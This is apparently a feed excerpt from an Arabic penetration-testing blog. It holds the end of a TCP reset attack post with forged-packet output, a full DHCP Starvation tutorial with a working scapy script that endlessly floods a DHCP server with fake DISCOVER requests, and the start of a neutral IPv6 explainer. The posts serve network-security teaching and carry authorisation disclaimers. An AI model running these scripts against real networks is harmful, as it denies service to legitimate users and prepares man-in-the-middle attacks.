&lt;p&gt;الآن وعند تنفيذ هذا الكود سيتم خلق حزمة بيانات مزورة لها flag reset مع عناوين IP للمصدر والهدف هي عناوين الأجهزة الهدف وسيتم إرسال هذه الحزمة وسيتم قطع الاتصال بين الأجهزة الهدف&lt;/p&gt;
&lt;pre tabindex=&quot;0&quot; data-language=&quot;text&quot;&gt;&lt;code&gt;&lt;span&gt;&lt;span&gt;python3 tcpreset.py&lt;/span&gt;&lt;/span&gt;
&lt;span&gt;&lt;span&gt;SENDING RESET PACKET.........&lt;/span&gt;&lt;/span&gt;
&lt;span&gt;&lt;span&gt;version    : BitField  (4 bits)        = 4              (4)&lt;/span&gt;&lt;/span&gt;
&lt;span&gt;&lt;span&gt;ihl        : BitField  (4 bits)        = None           (None)&lt;/span&gt;&lt;/span&gt;
&lt;span&gt;&lt;span&gt;tos        : XByteField                = 0              (0)&lt;/span&gt;&lt;/span&gt;
&lt;span&gt;&lt;span&gt;len        : ShortField                = None           (None)&lt;/span&gt;&lt;/span&gt;
&lt;span&gt;&lt;span&gt;id         : ShortField                = 1              (1)&lt;/span&gt;&lt;/span&gt;
&lt;span&gt;&lt;span&gt;flags      : FlagsField (3 bits)       = &amp;lt;Flag 0 ()&amp;gt;    (&amp;lt;Flag 0 ()&amp;gt;)&lt;/span&gt;&lt;/span&gt;
&lt;span&gt;&lt;span&gt;frag       : BitField  (13 bits)       = 0              (0)&lt;/span&gt;&lt;/span&gt;
&lt;span&gt;&lt;span&gt;ttl        : ByteField                 = 64             (64)&lt;/span&gt;&lt;/span&gt;
&lt;span&gt;&lt;span&gt;proto      : ByteEnumField             = 6              (0)&lt;/span&gt;&lt;/span&gt;
&lt;span&gt;&lt;span&gt;chksum     : XShortField               = None           (None)&lt;/span&gt;&lt;/span&gt;
&lt;span&gt;&lt;span&gt;src        : SourceIPField             = &apos;192.168.17.135&apos; (None)&lt;/span&gt;&lt;/span&gt;
&lt;span&gt;&lt;span&gt;dst        : DestIPField               = &apos;192.168.17.129&apos; (None)&lt;/span&gt;&lt;/span&gt;
&lt;span&gt;&lt;span&gt;options    : PacketListField           = []             ([])&lt;/span&gt;&lt;/span&gt;
&lt;span&gt;&lt;span&gt;--&lt;/span&gt;&lt;/span&gt;
&lt;span&gt;&lt;span&gt;sport      : ShortEnumField            = 44962          (20)&lt;/span&gt;&lt;/span&gt;
&lt;span&gt;&lt;span&gt;dport      : ShortEnumField            = 23             (80)&lt;/span&gt;&lt;/span&gt;
&lt;span&gt;&lt;span&gt;seq        : IntField                  = 3467116117     (0)&lt;/span&gt;&lt;/span&gt;
&lt;span&gt;&lt;span&gt;ack        : IntField                  = 0              (0)&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;
&lt;blockquote&gt;
&lt;p&gt;لا تقم باستهداف أي شبكة لا تملكها أو لا تملك صلاحية يٌسمح لك من خلالها القيام بذلك، لا تقم بأي عمل غير قانوني أو غير اخلاقي&lt;/p&gt;
&lt;/blockquote&gt;
</content:encoded><category>اختبار الاختراق</category><category>TCP</category><category>TCP Reset</category><category>hping3</category><category>scapy</category><category>الشبكات</category></item><item><title>هجوم DHCP Starvation بلغة البايثون</title><link>https://blog.cyberpedia.site/dhcp-starvation-attack/</link><guid isPermaLink="true">https://blog.cyberpedia.site/dhcp-starvation-attack/</guid><description>شرح بروتوكول DHCP ورسائله وآلية عمل DORA، وكيف ينفَّذ هجوم DHCP Starvation بسكربت بايثون وscapy لإغراق السيرفر واستنفاد عناوين IP، مع مراقبته بـ tcpdump.</description><pubDate>Sat, 27 Nov 2021 08:08:54 GMT</pubDate><content:encoded>&lt;p&gt;&lt;strong&gt;هجوم DHCP Starvation يُغرق سيرفر DHCP بطلبات DISCOVER وهمية بعناوين MAC عشوائية حتى يستنفد مجال عناوين IP، فيمنع الأجهزة الشرعية من الحصول على عنوان (حجب خدمة) وقد يمهّد لهجوم رجل في المنتصف عبر سيرفر DHCP بديل. يُنفَّذ بسكربت بايثون باستخدام scapy ويُراقب بأداة tcpdump.&lt;/strong&gt;&lt;/p&gt;&lt;p&gt;هذا الهجوم يتم من خلال إغراق سيرفر DHCP بطلبات DISCOVER وهمية حتى يستنفذ إمكانية توفير عناوين IP وعندها لن يكون قادر على تأمين عناوين IP لأجهزة الشبكة الشرعية (منع الخدمة) وهذا النوع من الهجمات يستخدم من قبل المهاجم لربط الهدف مع سيرفر DHCP بديل يؤدي لهجوم رجل في المنتصف MITM Attack – Man-in-the-Middle&lt;/p&gt;
&lt;h2 id=&quot;في-البداية-لنقم-بالتعرف-على-dhcp&quot;&gt;في البداية لنقم بالتعرف على DHCP&lt;/h2&gt;
&lt;p&gt;يمكننا تخصيص &lt;a href=&quot;http://www.cyberfu.tech/ip/&quot;&gt;عناوين IP&lt;/a&gt; للأجهزة بشكل يدوي ولكن هذه الطريقة لا تعتبر مثالية لعدة أسباب، ففي حال وجود عدد كبير من الأجهزة فإن عملية تخصيص العناوين بشكل يدوي ستكون عملية صعبة وفي حال قام مدير الشبكة بتغير قناع الشبكة لتغير بنية الشبكة فسوف يتوجب عليه إعادة تعيين عناوين IP لكل الأجهزة ضمن الشبكة لذلك تم إيجاد آلية تؤمن العنونة بشكل أوتوماتيكي وهي:&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;DHCP – Dynamic Host Configuration Protocol&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;والتي تقوم بتخصيص العناوين لكل الأجهزة ضمن الشبكة بشكل أوتوماتيكي&lt;/p&gt;
&lt;h2 id=&quot;كيف-يعمل-dhcp&quot;&gt;كيف يعمل DHCP؟&lt;/h2&gt;
&lt;p&gt;المعيار RFC 2131 عرف آلية عمل هذا البرتوكول والذي يعتبر client-server Protocol وهو يؤمن آلية العنونة بشكل تلقائي حيث يتم اعداد سيرفر DHCP بمجال من العناوين يسمى pool وسيقوم بتخصيص عنوان لكل جهاز يتصل بالشبكة ويؤمن للجهاز الأمور التالية:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;عنوان IP (&lt;code&gt;IP address&lt;/code&gt;)&lt;/li&gt;
&lt;li&gt;قناع الشبكة (&lt;code&gt;Network mask&lt;/code&gt;)&lt;/li&gt;
&lt;li&gt;البوابة الافتراضية (&lt;code&gt;Default gateway&lt;/code&gt;)&lt;/li&gt;
&lt;li&gt;عنوان سيرفر DNS (&lt;code&gt;DNS Server&lt;/code&gt;)&lt;/li&gt;
&lt;li&gt;اسم النطاق (&lt;code&gt;Domain name&lt;/code&gt;)&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;البروتوكول DHCP يستخدم UDP لحركة البيانات عبر البورت 67 في السيرفر والبورت 68 للمستخدم وله عدد من الرسائل وهي:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;DHCPDISCOVERY:&lt;/strong&gt; تستخدم من قبل المستخدم لاكتشاف سيرفرات DHCP داخل الشبكة وتتم من خلال إرسال broadcast باستخدام العنوان 255.255.255.255 وعادةً ما يكون عنوان المصدر هو 0.0.0.0&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;DHCPOFFER:&lt;/strong&gt; ترسل من قبل سيرفر DHCP إلى المستخدم وتتضمن عنوان IP مقترح يسمى YIADDR وقناع الشبكة وتحوي ايضاً على معرف السيرفر server ID الذي هو عنوان IP الخاص بالسيرفر ويسمى SIADDR، من الممكن أن يتواجد أكثر من سيرفر DHCP ضمن نفس الشبكة وفي هذه الحالة سيتم إرسال أكثر من رسالة DHCPOFFER كإجابة على DHCPDISCOVERY&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;DHCPREQUEST:&lt;/strong&gt; ترسل من المستخدم ك broadcast وهذه الرسالة تستخدم لتأكيد العرض من السيرفر وتتضمن SIADDR الخاص بسيرفر DHCP الذي تم اختياره وهذه الرسالة ترسل بشكل broadcast وليس unicast لتأمين معلومات لسيرفر DHCP الذي لم يتم اختياره من قبل المستخدم&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;DHCP ACKNOWLEDGEMENT (DHCPACK):&lt;/strong&gt; ترسل من قبل السيرفر إلى المستخدم لتأكيد عنوان IP المقترح ومعلومات أخرى&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;DHCP Not ACKNOWLEDGED (DHCPNACK):&lt;/strong&gt; ترسل من قبل السيرفر إلى المستخدم في حالة تم استخدام عنوان IP بعد رسالة DHCPOFFER&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;DHCPDECLINE:&lt;/strong&gt; ترسل من قبل المستخدم إلى السيرفر للإشارة أن العنوان المخصص تم استخدامه&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;DHCPRELEASE:&lt;/strong&gt; ترسل من قبل المستخدم إلى السيرفر لتحرير عنوان IP المخصص عند انهاء الاتصال&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;DHCPINFORM:&lt;/strong&gt; ترسل من قبل المستخدم إلى السيرفر وتستخدم لطلب إعدادات الشبكة الإضافية وبعد أن يحصل المستخدم على عنوان IP&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;img alt=&quot;مخطط آلية DORA في DHCP: المستخدم يرسل DISCOVER ثم يستقبل OFFER من السيرفر ثم يرسل REQUEST فيردّ السيرفر بـ ACK لتخصيص عنوان IP&quot; width=&quot;1600&quot; height=&quot;4511&quot; src=&quot;https://blog.cyberpedia.site/_astro/img-01.CufzSbh6_Z2BSui.webp&quot;&gt;&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;عند أول اتصال للجهاز بالشبكة فهو لا يملك عنوان IP وسوف يقوم بارسال حزمة DHCPDISCOVERY لاكتشاف سيرفرات DHCP داخل الشبكة، من الممكن أن تحوي نفس الشبكة على أكثر من سيرفر DHCP&lt;/li&gt;
&lt;li&gt;كل سيرفر سيرد برسالة DHCPOFFER&lt;/li&gt;
&lt;li&gt;المستخدم يستقبل أكثر من عرض ويختار أحدها ويرد برسالة DHCPREQUEST&lt;/li&gt;
&lt;li&gt;سيرفر DHCP الذي تم اختياره سيرد على المستخدم برسالة DHCPACK لتأكيد عملية تخصيص عنوان IP&lt;/li&gt;
&lt;/ol&gt;
&lt;h2 id=&quot;هجوم-dhcp-starvation&quot;&gt;هجوم DHCP Starvation&lt;/h2&gt;
&lt;p&gt;هذا الهجوم يتم من خلال إغراق سيرفر DHCP بطلبات DISCOVER وهمية حتى يستنفذ إمكانية توفير عناوين IP وعندها لن يكون قادر على تأمين عناوين IP لأجهزة الشبكة الشرعية (منع الخدمة) وهذا النوع من الهجمات يستخدم من قبل المهاجم لربط الهدف مع سيرفر DHCP بديل يؤدي لهجوم رجل في المنتصف MITM Attack – Man-in-the-Middle&lt;/p&gt;
&lt;p&gt;لنقم بتنفيذ هذا الهجوم بشكل يدوي من خلال كتابة سكريبت بلغة البايثون يقوم بخلق طلبات DHCP وهمية وارسالها بشكل متكرر مع عناوين MAC وهمية لإغراق سيرفر DHCP واستنفاذ كل عناوين IP المتاحة لديه&lt;/p&gt;
&lt;p&gt;بيئة الاختبار: نظام كالي لينكس على جهاز المهاجم.&lt;/p&gt;
&lt;p&gt;في البداية لنقم باستيراد scapy إن لم تكن منصبة لديك مسبقاً يمكنك تنصيبها باستخدام التعليمة التالية على نظام كالي لينكس&lt;/p&gt;
&lt;pre tabindex=&quot;0&quot; data-language=&quot;bash&quot;&gt;&lt;code&gt;&lt;span&gt;&lt;span&gt;sudo&lt;/span&gt;&lt;span&gt; apt&lt;/span&gt;&lt;span&gt; install&lt;/span&gt;&lt;span&gt; python3-scapy&lt;/span&gt;&lt;/span&gt;
&lt;span&gt;&lt;span&gt;#أو عبر pip&lt;/span&gt;&lt;/span&gt;
&lt;span&gt;&lt;span&gt;pip&lt;/span&gt;&lt;span&gt; install&lt;/span&gt;&lt;span&gt; scapy&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;strong&gt;لنقم بخلق طلبات DHCP Discover لها:&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;عنوان الوجهة broadcast&lt;/li&gt;
&lt;li&gt;عنوان MAC عشوائي كعنوان للمصدر&lt;/li&gt;
&lt;li&gt;عنوان IP للمصدر 0.0.0.0 (آلية عمل طلبات DHCP – الجهاز لا يملك عنوان IP ويرغب بالحصول على عنوان من سيرفر DHCP)&lt;/li&gt;
&lt;li&gt;Source port = 68&lt;/li&gt;
&lt;li&gt;Destination port = 67&lt;/li&gt;
&lt;li&gt;نوع الرسالة DHCP discover&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;وبعد خلق هذا الطلب لنقم بتكرار إرساله عبر كرت الشبكة eth0&lt;/p&gt;
&lt;p&gt;الآن لنقم بتنفيذ الكود الخاص بعملية الهجوم:&lt;/p&gt;
&lt;pre tabindex=&quot;0&quot; data-language=&quot;python&quot;&gt;&lt;code&gt;&lt;span&gt;&lt;span&gt;#مثال توضيحي: إنشاء طلبات DHCP Discover وهمية وإرسالها بشكل متكرر&lt;/span&gt;&lt;/span&gt;
&lt;span&gt;&lt;span&gt;from&lt;/span&gt;&lt;span&gt; scapy.all &lt;/span&gt;&lt;span&gt;import&lt;/span&gt;&lt;span&gt; Ether, &lt;/span&gt;&lt;span&gt;IP&lt;/span&gt;&lt;span&gt;, &lt;/span&gt;&lt;span&gt;UDP&lt;/span&gt;&lt;span&gt;, &lt;/span&gt;&lt;span&gt;BOOTP&lt;/span&gt;&lt;span&gt;, &lt;/span&gt;&lt;span&gt;DHCP&lt;/span&gt;&lt;span&gt;, sendp, RandMAC&lt;/span&gt;&lt;/span&gt;
&lt;span&gt;&lt;/span&gt;
&lt;span&gt;&lt;span&gt;def&lt;/span&gt;&lt;span&gt; dhcp_discover&lt;/span&gt;&lt;span&gt;():&lt;/span&gt;&lt;/span&gt;
&lt;span&gt;&lt;span&gt;    src_mac &lt;/span&gt;&lt;span&gt;=&lt;/span&gt;&lt;span&gt; str&lt;/span&gt;&lt;span&gt;(RandMAC()) &lt;/span&gt;&lt;span&gt;# عنوان MAC عشوائي لكل طلب&lt;/span&gt;&lt;/span&gt;
&lt;span&gt;&lt;span&gt;    pkt &lt;/span&gt;&lt;span&gt;=&lt;/span&gt;&lt;span&gt; (&lt;/span&gt;&lt;/span&gt;
&lt;span&gt;&lt;span&gt;        Ether(&lt;/span&gt;&lt;span&gt;src&lt;/span&gt;&lt;span&gt;=&lt;/span&gt;&lt;span&gt;src_mac, &lt;/span&gt;&lt;span&gt;dst&lt;/span&gt;&lt;span&gt;=&lt;/span&gt;&lt;span&gt;&quot;ff:ff:ff:ff:ff:ff&quot;&lt;/span&gt;&lt;span&gt;)&lt;/span&gt;&lt;/span&gt;
&lt;span&gt;&lt;span&gt;        /&lt;/span&gt;&lt;span&gt; IP(&lt;/span&gt;&lt;span&gt;src&lt;/span&gt;&lt;span&gt;=&lt;/span&gt;&lt;span&gt;&quot;0.0.0.0&quot;&lt;/span&gt;&lt;span&gt;, &lt;/span&gt;&lt;span&gt;dst&lt;/span&gt;&lt;span&gt;=&lt;/span&gt;&lt;span&gt;&quot;255.255.255.255&quot;&lt;/span&gt;&lt;span&gt;)&lt;/span&gt;&lt;/span&gt;
&lt;span&gt;&lt;span&gt;        /&lt;/span&gt;&lt;span&gt; UDP(&lt;/span&gt;&lt;span&gt;sport&lt;/span&gt;&lt;span&gt;=&lt;/span&gt;&lt;span&gt;68&lt;/span&gt;&lt;span&gt;, &lt;/span&gt;&lt;span&gt;dport&lt;/span&gt;&lt;span&gt;=&lt;/span&gt;&lt;span&gt;67&lt;/span&gt;&lt;span&gt;)&lt;/span&gt;&lt;/span&gt;
&lt;span&gt;&lt;span&gt;        /&lt;/span&gt;&lt;span&gt; BOOTP(&lt;/span&gt;&lt;span&gt;chaddr&lt;/span&gt;&lt;span&gt;=&lt;/span&gt;&lt;span&gt;src_mac)&lt;/span&gt;&lt;/span&gt;
&lt;span&gt;&lt;span&gt;        /&lt;/span&gt;&lt;span&gt; DHCP(&lt;/span&gt;&lt;span&gt;options&lt;/span&gt;&lt;span&gt;=&lt;/span&gt;&lt;span&gt;[(&lt;/span&gt;&lt;span&gt;&quot;message-type&quot;&lt;/span&gt;&lt;span&gt;, &lt;/span&gt;&lt;span&gt;&quot;discover&quot;&lt;/span&gt;&lt;span&gt;), &lt;/span&gt;&lt;span&gt;&quot;end&quot;&lt;/span&gt;&lt;span&gt;])&lt;/span&gt;&lt;/span&gt;
&lt;span&gt;&lt;span&gt;    )&lt;/span&gt;&lt;/span&gt;
&lt;span&gt;&lt;span&gt;    return&lt;/span&gt;&lt;span&gt; pkt&lt;/span&gt;&lt;/span&gt;
&lt;span&gt;&lt;/span&gt;
&lt;span&gt;&lt;span&gt;#تكرار الإرسال عبر كرت الشبكة eth0 لإغراق سيرفر DHCP&lt;/span&gt;&lt;/span&gt;
&lt;span&gt;&lt;span&gt;while&lt;/span&gt;&lt;span&gt; True&lt;/span&gt;&lt;span&gt;:&lt;/span&gt;&lt;/span&gt;
&lt;span&gt;&lt;span&gt;    sendp(dhcp_discover(), &lt;/span&gt;&lt;span&gt;iface&lt;/span&gt;&lt;span&gt;=&lt;/span&gt;&lt;span&gt;&quot;eth0&quot;&lt;/span&gt;&lt;span&gt;, &lt;/span&gt;&lt;span&gt;verbose&lt;/span&gt;&lt;span&gt;=&lt;/span&gt;&lt;span&gt;0&lt;/span&gt;&lt;span&gt;)&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;أثناء تنفيذ الهجوم لنقم بمراقبة حركة البيانات باستخدام التعليمة tcpdump&lt;/p&gt;
&lt;p&gt;&lt;img alt=&quot;مخرجات أداة tcpdump تُظهر سيلاً من حزم DHCP Discover صادرة من عناوين MAC وهمية مختلفة لإغراق السيرفر&quot; width=&quot;1600&quot; height=&quot;900&quot; src=&quot;https://blog.cyberpedia.site/_astro/img-02.CDdZ2A2A_ZbAFiE.webp&quot;&gt;&lt;/p&gt;
&lt;p&gt;كما تلاحظ لقد قمنا بإغراق سيرفر DHCP بالطلبات باستخدام عناوين MAC وهمية وأي جهاز جديد يحاول الاتصال بنفس الشبكة لن يكون قادر على الحصول على عنوان IP من سيرفر DHCP&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;لا تقم باستهداف أي شبكة لا تملكها أو لا تملك صلاحية يُسمح لك من خلالها القيام بذلك، لا تقم بأي عمل غير قانوني أو غير أخلاقي&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;في مقال قادم سنتعرف على طرق الحماية ضد هذا الهجوم وهجمات الطبقة الثانية بشكل عام&lt;/p&gt;
</content:encoded><category>اختبار الاختراق</category><category>DHCP</category><category>DHCP Starvation</category><category>scapy</category><category>البايثون</category><category>هجوم حجب الخدمة</category><category>MITM</category></item><item><title>نظام العنونة IPv6</title><link>https://blog.cyberpedia.site/ipv6/</link><guid isPermaLink="true">https://blog.cyberpedia.site/ipv6/</guid><description>شرح نظام العنونة IPv6: مقارنته مع IPv4، وبنية الترويسة والترويسات الإضافية، وطريقة كتابة العناوين واختصارها، وأنواعها والعناوين المحجوزة.</description><pubDate>Thu, 04 Nov 2021 08:14:00 GMT</pubDate><content:encoded>&lt;p&gt;&lt;strong&gt;IPv6 نظام عنونة بطول 128 بت أُوجد حلاً طويل الأمد لنفاد عناوين IPv4 ذات الـ 32 بت، ويُكتب بثماني مجموعات ست عشرية يمكن اختصار أصفارها باستخدام (::) مرة واحدة. يستخدم ترويسة ثابتة بحجم 40 بايت مع ترويسات إضافية، ويستبدل ARP ببروتوكول Neighbor Discovery، ولا يحتاج إلى NAT أو عناوين broadcast.&lt;/strong&gt;&lt;/p&gt;&lt;p&gt;مع التطور والانتشار الكبير لشبكة الانترنت والشبكات المعتمدة بآلية الاتصال على TCP/IP فإن عدد عناوين IPv4 أصبح مستهلكاً بشكل شبه كامل، استخدام شبكات محلية مع عناوين IP خاصة وتقنية NAT ساعد بحل هذه المشكلة ولكنه ليس حلاً جذرياً، لذلك تم إيجاد IPv6 ليكون حلاً طويل الأمد لهذه المشكلة، وهو قادر على التعامل مع عدد كبير جداً من عناوين IP وبالتالي يدعم عدداً كبيراً جداً من الأجهزة المتصلة بالانترنت.&lt;/p&gt;
&lt;p&gt;تعرفنا في &lt;a href=&quot;https://blog.cyberpedia.site/ip/&quot;&gt;مقال سابق&lt;/a&gt; عن عناوين IP بشكل عام.&lt;/p&gt;
&lt;p&gt;كل الأمور الخاصة بالطبقة الثالثة كآلية توجيه البيانات وبروتوكولات التوجيه كلها تعمل بنفس الطريقة مع عناوين IPv6 مع إضافة بعض التعديلات بسبب اختلاف طول العناوين.&lt;/p&gt;
&lt;h2 id=&quot;مقارنة-بين-ipv4-وipv6&quot;&gt;مقارنة بين IPv4 وIPv6&lt;/h2&gt;
&lt;p&gt;الجدول التالي هو مقارنة بين عناوين IPv4 وIPv6:&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;&lt;/th&gt;
&lt;th&gt;IPv4&lt;/th&gt;
&lt;th&gt;IPv6&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;العنوان&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;يستخدم 32 bit&lt;/td&gt;
&lt;td&gt;يستخدم 128 bit&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;نوع العنوان&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Unicast, multicast and broadcast&lt;/td&gt;
&lt;td&gt;Unicast, anycast, and multicast والنوع broadcast يتم من خلال استخدام عنوان محدد&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Subnetting and prefix&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;يمكن استخدام subnet والبادئة الخاصة بجزء الشبكة يشار لها بـ /nn بعد عنوان IP&lt;/td&gt;
&lt;td&gt;يمكن استخدام subnet والبادئة الخاصة بجزء الشبكة يشار لها بـ /nnn بعد عنوان IP&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;تخصيص العناوين&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Static and dynamic via DHCP&lt;/td&gt;
&lt;td&gt;يدعم عدة طرق لتخصيص عنوان IP: Static، وStatic prefix with EUI-64 and other method، وStateless address auto-configuration (SLAAC)، وStateful DHCPv6&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Private IP&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;يوجد عدد من المجالات الخاصة والتي لا يمكن استخدامها للوصول لشبكة الانترنت&lt;/td&gt;
&lt;td&gt;يدعم العناوين الخاصة بشكل مشابه لـ IPv4 ولا يمكن استخدامها للوصول للانترنت&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Interface IP address&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;عنوان واحد فقط&lt;/td&gt;
&lt;td&gt;يمكن استخدام أكثر من عنوان&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;DNS&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;يستخدم السجل A&lt;/td&gt;
&lt;td&gt;يستخدم السجل AAAA&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;IP header&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;له حجم متغير بين 20-60 bytes بحسب الخيارات المضافة&lt;/td&gt;
&lt;td&gt;له حجم ثابت 40 bytes ولا يدعم خيارات ولكنه يستخدم ترويسات إضافية لحمل المعلومات لبروتوكولات الطبقة الثالثة&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;بروتوكولات التوجيه&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;يدعم: Distance vector, link-state, hybrid، وأكثر البروتوكولات استخداماً هي: RIPv2, OSPFv2, EIGRP, IS-IS for IGP and BGP-4 for EGP&lt;/td&gt;
&lt;td&gt;يدعم: distance vector, link-state and hybrid ويتطلب إصدارات جديدة من بروتوكولات محددة مثل: RIPng, OSPFv3, EIGRP for IPv6, MP-BGP&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;بروتوكول الإدارة&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;ICMP&lt;/td&gt;
&lt;td&gt;ICMPv6&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;تحديد العناوين&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;يستخدم ARP protocol&lt;/td&gt;
&lt;td&gt;يستخدم Neighbor Discovery Protocol مع ICMPv6&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;NAT&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;يستخدم NAT مع عناوين IP الخاصة للسماح لها بالاتصال مع خارج الشبكة باستخدام عنوان IP عام&lt;/td&gt;
&lt;td&gt;يحوي عدداً كبيراً جداً من العناوين وكل جهاز يخصص له عنوان خاص ولا يوجد حاجة لاستخدام NAT&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;h2 id=&quot;مثال-على-الاتصال-باستخدام-ipv6&quot;&gt;مثال على الاتصال باستخدام IPv6&lt;/h2&gt;
&lt;p&gt;الشكل التالي هو مثال لعملية اتصال بين الجهاز A والجهاز B باستخدام IPv6، وبشكل مشابه للإصدار الرابع IPv4 سيتم تخصيص عنوان لكل جهاز في الطبقة الثالثة وكل router interface سيكون له عنوان IPv6 أيضاً.&lt;/p&gt;
&lt;p&gt;الجهاز A سيقوم بإرسال حزمة بيانات IPv6 ليتم تغليفها ضمن Ethernet Frame إلى البوابة الافتراضية default gateway والتي هي الراوتر R1.&lt;/p&gt;
&lt;p&gt;الراوتر R1 يقوم بعملية فك التغليف لحزمة البيانات وينظر إلى جدول التوجيه ليعرف مسار القفزة التالية ويجد أن مسار القفزة التالية هو الراوتر R2، ويقوم بتغليف حزمة البيانات على شكل Layer2 Frame ويقوم بإرسالها إلى الراوتر R2 والذي سوف يقوم بنفس العملية حتى يقوم بإيصال الحزمة إلى الجهاز B.&lt;/p&gt;
&lt;p&gt;&lt;img alt=&quot;مخطط انتقال حزمة IPv6 من الجهاز A عبر الراوترين R1 وR2 إلى الجهاز B مع إعادة التغليف عند كل قفزة&quot; width=&quot;1600&quot; height=&quot;900&quot; src=&quot;https://blog.cyberpedia.site/_astro/img-01.DSdPXGtE_Z28ANwY.webp&quot;&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;مثال توضيحي&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;في المثال السابق الاختلاف الواضح عن الإصدار السابق هو شكل عنوان IP، ولكن هناك اختلافات أخرى غير مرئية وهي: كيف يعرف IPv6 الوجهة الافتراضية default gateway؟ وهل يقوم باستخدام ARP لإيجاد عنوان MAC address لجهاز معروف عنوانه IP ضمن نفس الشبكة الفرعية subnet؟&lt;/p&gt;
&lt;p&gt;العديد من البروتوكولات التي تعمل مع الإصدار الرابع IPv4 من الممكن أن تعمل مع الإصدار السادس IPv6 ولكن مع بعض التعديلات، ويوجد بعض البروتوكولات غير الضرورية في الإصدار السادس وبعض البروتوكولات الجديدة التي تم استخدامها، مثلاً ICMP وDHCP لا يتم استخدامهما بشكل مماثل للإصدار السابق لذلك تم إيجاد ICMPv6 وDHCPv6، وآلية عمل البروتوكول ARP تم استبدالها ببروتوكول يدعى IPv6 Neighbor Discovery، والبروتوكولات OSPF وEIGRP وبروتوكولات التوجيه الأخرى تم تعديلها للعمل مع الإصدار السادس وأصبحت OSPFv6 وEIGRPv6 وRIPng.&lt;/p&gt;
&lt;h2 id=&quot;ipv6-header&quot;&gt;IPv6 Header&lt;/h2&gt;
&lt;p&gt;عناوين الإصدار السادس مصممة لتقدم نفس المهمة الخاصة بعناوين الإصدار الرابع مع تطوير في بعض الأمور الأخرى، المعيار RFC 2460 عرّف الترويسة الخاصة بـ IPv6 packet.&lt;/p&gt;
&lt;p&gt;&lt;img alt=&quot;حقول الترويسة الأساسية لحزمة IPv6 وفق RFC 2460: Version وTraffic Class وFlow Label وPayload Length وNext Header وHop Limit وعنوانا المصدر والوجهة&quot; width=&quot;1600&quot; height=&quot;1093&quot; src=&quot;https://blog.cyberpedia.site/_astro/img-02.Deo1HzfH_ZHlahH.webp&quot;&gt;&lt;/p&gt;
&lt;p&gt;معظم الحقول لها نفس الغرض بالمقارنة مع IPv4، ولكن في IPv6 يوجد اختلاف أساسي وهو الإضافات بالترويسات مع طول الترويسة الثابت، IPv6 يسمح للترويسة بحمل معلومات لبروتوكولات الطبقة الثالثة، والترويسات الإضافية تتموضع بعد الترويسة الثابتة وقبل الحمولة payload.&lt;/p&gt;
&lt;p&gt;الحقل Next header يستخدم لتحديد الترويسة التالية في حزمة البيانات، وفي حال عدم وجود ترويسات إضافية فسوف يشير هذا الحقل إلى ترويسة الطبقة الرابعة (مثل TCP header)، وفي حال وجود ترويسة إضافية فسوف يشير إلى نوع الترويسة الإضافية.&lt;/p&gt;
